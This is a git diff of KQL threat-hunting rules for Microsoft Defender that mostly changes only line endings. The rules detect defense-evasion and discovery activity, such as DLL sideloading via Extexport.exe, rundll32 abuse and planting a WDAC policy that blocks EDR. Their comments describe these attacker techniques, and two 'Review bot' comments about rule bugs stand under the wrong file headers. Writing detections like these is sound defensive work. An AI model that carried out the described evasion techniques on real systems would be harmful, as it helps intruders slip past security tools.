-// Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa.
-// It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll".
-// Arbitrary DLLs can also be loaded if a specific number of flags was provided.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: Potential DLL Sideloading Activity Via ExtExport.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-26
+// Level: medium
+// Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa.
+// It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll".
+// Arbitrary DLLs can also be loaded if a specific number of flags was provided.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+
+DeviceProcessEvents
 | where FolderPath endswith "\\Extexport.exe" or ProcessVersionInfoOriginalFileName =~ "extexport.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
index a75cc6de..c7b2aa51 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
@@ -1,15 +1,15 @@
-// Title: Potential Proxy Execution Via Explorer.EXE From Shell Process
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
-// Date: 2020-10-05
-// Level: low
-// Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe".
-// Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter.
-// While this is often a legitimate action, this rule can be use to hunt for anomalies.
-// Muddy Waters threat actor was seeing using this technique.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
-// False Positives:
-// - Legitimate explorer.exe run from a shell host like "cmd.exe" or "powershell.exe"
-
-DeviceProcessEvents
+// Title: Potential Proxy Execution Via Explorer.EXE From Shell Process
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
+// Date: 2020-10-05
+// Level: low
+// Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe".
+// Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter.
+// While this is often a legitimate action, this rule can be use to hunt for anomalies.
+// Muddy Waters threat actor was seeing using this technique.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+// False Positives:
+// - Legitimate explorer.exe run from a shell host like "cmd.exe" or "powershell.exe"
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "explorer.exe" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql
index f7636048..f05c72fa 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql
@@ -1,13 +1,13 @@
-// Title: Potential Suspicious Execution From GUID Like Folder Names
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-01
-// Level: low
-// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks.
-// Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting
-// False Positives:
-// - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly
-
-DeviceProcessEvents
+// Title: Potential Suspicious Execution From GUID Like Folder Names
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: low
+// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks.
+// Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting
+// False Positives:
+// - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and (ProcessCommandLine contains "\\{" and ProcessCommandLine contains "}\\")) and (not((FolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or (FolderPath contains "\\{" and FolderPath contains "}\\") or (FolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
index d9e0f02d..241b830e 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
@@ -1,14 +1,14 @@
-// Title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2023-12-01
-// Level: medium
-// Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace.
-// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
-// These can be used for example in decrypting malicious payload for defense evasion.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1059.001, attack.t1027.010, attack.t1547.001, detection.threat-hunting
-// False Positives:
-// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.
-
-DeviceRegistryEvents
+// Title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-12-01
+// Level: medium
+// Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace.
+// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
+// These can be used for example in decrypting malicious payload for defense evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1059.001, attack.t1027.010, attack.t1547.001, detection.threat-hunting
+// False Positives:
+// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Shell\\Open\\Command" and (RegistryValueData contains ".AesCryptoServiceProvider" or RegistryValueData contains ".DESCryptoServiceProvider" or RegistryValueData contains ".DSACryptoServiceProvider" or RegistryValueData contains ".RC2CryptoServiceProvider" or RegistryValueData contains ".Rijndael" or RegistryValueData contains ".RSACryptoServiceProvider" or RegistryValueData contains ".TripleDESCryptoServiceProvider") and (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryValueData contains "System.Security.Cryptography."
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
index 3cd4b760..55114655 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
@@ -1,13 +1,13 @@
-// Title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2023-10-17
-// Level: medium
-// Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
-// False Positives:
-// - Legitimate usage as part of application installation, but less likely from e.g. temporary paths.
-// - Not every instance is considered malicious, but this rule will capture the malicious usages.
-
-DeviceProcessEvents
+// Title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-17
+// Level: medium
+// Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+// False Positives:
+// - Legitimate usage as part of application installation, but less likely from e.g. temporary paths.
+// - Not every instance is considered malicious, but this rule will capture the malicious usages.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "DllRegisterServer" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((ProcessCommandLine contains ":\\Program Files (x86)" or ProcessCommandLine contains ":\\Program Files\\" or ProcessCommandLine contains ":\\Windows\\System32\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql
index 0e9d4b86..0a47b1af 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql
@@ -1,13 +1,13 @@
-// Title: Service Binary in User Controlled Folder
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022-05-02
-// Level: medium
-// Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
-// Attackers often use such directories for staging purposes.
-// This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
-// Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting
-
-DeviceRegistryEvents
+// Title: Service Binary in User Controlled Folder
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-05-02
+// Level: medium
+// Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
+// Attackers often use such directories for staging purposes.
+// This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
+// Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting
+
+DeviceRegistryEvents
 | where ((RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\AppData\\Roaming\\") and (RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\ImagePath") and (not((RegistryValueData contains "C:\\ProgramData\\Microsoft\\Windows Defender\\" and (RegistryKey endswith "\\Services\\WinDefend*" or RegistryKey contains "\\Services\\MpKs")))) and (not((((RegistryValueData contains "C:\\Users\\" and RegistryValueData contains "AppData\\Local\\Temp\\MBAMInstallerService.exe") and RegistryKey contains "\\Services\\MBAMInstallerService") or (RegistryValueData contains "C:\\Program Files\\Common Files\\Zoom\\Support\\CptService.exe" and RegistryKey contains "\\Services\\ZoomCptService"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql
index 60ecc659..db3b3197 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql
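Review bot: `RegistryKey endswith "\\Services*"` on the new `| where` line can never hold at the same time as `RegistryKey endswith "\\ImagePath"` on the same field, so the selection is dead and this rule will not return results; the trailing `*` reads like a Sigma wildcard that the converter emitted as a literal character rather than translating the operator. The same artefact appears in the Defender exclusion, `RegistryKey endswith "\\Services\\WinDefend*"`, which in turn never suppresses anything. The likely intent is a substring test, i.e. `RegistryKey contains "\\Services\\"` and `RegistryKey contains "\\Services\\WinDefend\\"`, and the converter's handling of `endswith` values that end in `*` is worth auditing across the other generated rules. The file content appears unchanged here apart from line endings, so the defect is pre-existing rather than introduced by this commit.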
@@ -1,10 +1,10 @@
-// Title: Set Files as System Files Using Attrib.EXE
-// Author: frack113
-// Date: 2022-02-04
-// Level: low
-// Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.001, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: Set Files as System Files Using Attrib.EXE
+// Author: frack113
+// Date: 2022-02-04
+// Level: low
+// Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001, detection.threat-hunting
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " +s " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql b/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql
index b3d1d905..d37fc7ef 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql
@@ -1,10 +1,10 @@
-// Title: Terminate Linux Process Via Kill
-// Author: Tuan Le (NCSGroup)
-// Date: 2023-03-16
-// Level: medium
-// Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: Terminate Linux Process Via Kill
+// Author: Tuan Le (NCSGroup)
+// Date: 2023-03-16
+// Level: medium
+// Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562, detection.threat-hunting
+
+DeviceProcessEvents
 | where FolderPath endswith "/kill" or FolderPath endswith "/killall" or FolderPath endswith "/pkill" or FolderPath endswith "/xkill"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql
index 72cd5fbf..4cb588e6 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql
@@ -1,18 +1,18 @@
-// Title: Use Short Name Path in Command Line
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022-08-07
-// Level: medium
-// Description: Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.
-// Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
-// When investigating, examine:
-// - Commands using short paths to access sensitive directories or files
-// - Web servers on Windows (especially Apache) where short filenames could bypass security controls
-// - Correlation with other suspicious behaviors
-// - baseline of short name usage in your environment and look for deviations
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004, detection.threat-hunting
-// False Positives:
-// - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.
-
-DeviceProcessEvents
+// Title: Use Short Name Path in Command Line
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-07
+// Level: medium
+// Description: Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.
+// Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
+// When investigating, examine:
+// - Commands using short paths to access sensitive directories or files
+// - Web servers on Windows (especially Apache) where short filenames could bypass security controls
+// - Correlation with other suspicious behaviors
+// - baseline of short name usage in your environment and look for deviations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004, detection.threat-hunting
+// False Positives:
+// - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "~1\\" or ProcessCommandLine contains "~2\\") and (not(((InitiatingProcessFolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v") or ((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe")) or (InitiatingProcessFolderPath endswith "\\winget.exe" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\WinGet\\")))) and (not(((InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe" or InitiatingProcessFolderPath endswith "\\Everything\\Everything.exe" or (ProcessCommandLine contains "C:\\Program Files\\Git\\post-install.bat" or ProcessCommandLine contains "C:\\Program Files\\Git\\cmd\\scalar.exe") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\veeam.backup.shell.exe" or (InitiatingProcessFolderPath endswith "\\WebEx\\webexhost.exe" or ProcessCommandLine contains "\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql
index 4e321041..84723fd6 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql
@@ -1,12 +1,12 @@
-// Title: WDAC Policy File Creation In CodeIntegrity Folder
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2025-01-30
-// Level: medium
-// Description: Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001, detection.threat-hunting
-// False Positives:
-// - May occur legitimately as part of admin activity, but rarely with interactive elevation.
-
-DeviceFileEvents
+// Title: WDAC Policy File Creation In CodeIntegrity Folder
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2025-01-30
+// Level: medium
+// Description: Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001, detection.threat-hunting
+// False Positives:
+// - May occur legitimately as part of admin activity, but rarely with interactive elevation.
+
+DeviceFileEvents
 | where InitiatingProcessIntegrityLevel =~ "High" and FolderPath contains ":\\Windows\\System32\\CodeIntegrity\\" and (FolderPath endswith ".cip" or FolderPath endswith ".p7b")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql
index 577c5378..291edba0 100644
--- a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql
+++ b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql
@@ -1,13 +1,13 @@
-// Title: CMD Shell Output Redirect
-// Author: frack113
-// Date: 2022-01-22
-// Level: low
-// Description: Detects the use of the redirection character ">" to redirect information on the command line.
-// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082, detection.threat-hunting
-// False Positives:
-// - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment
-
-DeviceProcessEvents
+// Title: CMD Shell Output Redirect
+// Author: frack113
+// Date: 2022-01-22
+// Level: low
+// Description: Detects the use of the redirection character ">" to redirect information on the command line.
+// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082, detection.threat-hunting
+// False Positives:
+// - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ">" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")) and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\Internet Download Manager\\IDMMsgHost.exe" or ProcessCommandLine contains "chrome-extension://" or ProcessCommandLine contains "\\.\\pipe\\chrome.nativeMessaging")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql b/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql
index 72b33b7e..47ec7162 100644
--- a/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql
+++ b/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql
@@ -1,12 +1,12 @@
-// Title: Net.EXE Execution
-// Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)
-// Date: 2019-01-16
-// Level: low
-// Description: Detects execution of "Net.EXE".
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1007, attack.t1049, attack.t1018, attack.t1135, attack.t1201, attack.t1069.001, attack.t1069.002, attack.t1087.001, attack.t1087.002, attack.lateral-movement, attack.t1021.002, attack.s0039, detection.threat-hunting
-// False Positives:
-// - Likely
-
-DeviceProcessEvents
+// Title: Net.EXE Execution
+// Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)
+// Date: 2019-01-16
+// Level: low
+// Description: Detects execution of "Net.EXE".
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007, attack.t1049, attack.t1018, attack.t1135, attack.t1201, attack.t1069.001, attack.t1069.002, attack.t1087.001, attack.t1087.002, attack.lateral-movement, attack.t1021.002, attack.s0039, detection.threat-hunting
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " accounts" or ProcessCommandLine contains " group" or ProcessCommandLine contains " localgroup" or ProcessCommandLine contains " share" or ProcessCommandLine contains " start" or ProcessCommandLine contains " stop " or ProcessCommandLine contains " user" or ProcessCommandLine contains " view") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/process_discovery.kql b/KQL/rules-threat-hunting/Discovery/process_discovery.kql
index 42e3ae8a..c8ef2920 100644
--- a/KQL/rules-threat-hunting/Discovery/process_discovery.kql
+++ b/KQL/rules-threat-hunting/Discovery/process_discovery.kql
@@ -1,13 +1,13 @@
-// Title: Process Discovery
-// Author: Ömer Günal, oscd.community, CheraaghiMilad
-// Date: 2020-10-06
-// Level: low
-// Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.
-// Information obtained could be used to gain an understanding of common software/applications running on systems within the network
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1057, detection.threat-hunting
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Process Discovery
+// Author: Ömer Günal, oscd.community, CheraaghiMilad
+// Date: 2020-10-06
+// Level: low
+// Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.
+// Information obtained could be used to gain an understanding of common software/applications running on systems within the network
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057, detection.threat-hunting
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/atop" or FolderPath endswith "/htop" or FolderPath endswith "/pgrep" or FolderPath endswith "/ps" or FolderPath endswith "/pstree" or FolderPath endswith "/top"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql b/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql
index 4fc3d766..91ba6406 100644
--- a/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql
+++ b/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql
@@ -1,13 +1,13 @@
-// Title: SC.EXE Query Execution
-// Author: frack113
-// Date: 2021-12-06
-// Level: low
-// Description: Detects execution of "sc.exe" to query information about registered services on the system
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1007, detection.threat-hunting
-// False Positives:
-// - Legitimate query of a service by an administrator to get more information such as the state or PID
-// - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1"
-
-DeviceProcessEvents
+// Title: SC.EXE Query Execution
+// Author: frack113
+// Date: 2021-12-06
+// Level: low
+// Description: Detects execution of "sc.exe" to query information about registered services on the system
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007, detection.threat-hunting
+// False Positives:
+// - Legitimate query of a service by an administrator to get more information such as the state or PID
+// - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1"
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " query" and (FolderPath endswith "\\sc.exe" and ProcessVersionInfoOriginalFileName =~ "sc.exe")) and (not(ProcessCommandLine =~ "sc query dokan1"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql b/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql
index 0eba801e..5294fe21 100644
--- a/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql
+++ b/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql
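Review bot: The image check on the new `| where` line joins `FolderPath endswith "\\sc.exe"` and `ProcessVersionInfoOriginalFileName =~ "sc.exe"` with `and`, whereas every sibling rule in this diff (attrib, rundll32, cmd, tasklist, wsl) joins the path and OriginalFileName tests with `or`. If the source rule lists these as alternative identifiers, as the siblings do, the `and` silently narrows coverage: a copy of the binary run under another name would carry the original file name but fail the path test and be dropped, which is precisely the case the OriginalFileName check exists to catch. Suggest `(FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")` if the source confirms it, and checking whether the converter treats a list of selection alternatives as a conjunction elsewhere. The content appears unchanged apart from line endings, so this predates the commit.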
@@ -1,12 +1,12 @@
-// Title: Suspicious Tasklist Discovery Command
-// Author: frack113
-// Date: 2021-12-11
-// Level: informational
-// Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1057, detection.threat-hunting
-// False Positives:
-// - Likely from users, administrator and different internal and third party applications.
-
-DeviceProcessEvents
+// Title: Suspicious Tasklist Discovery Command
+// Author: frack113
+// Date: 2021-12-11
+// Level: informational
+// Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057, detection.threat-hunting
+// False Positives:
+// - Likely from users, administrator and different internal and third party applications.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "tasklist" or FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql
index 9e9e7d55..9e3f60f9 100644
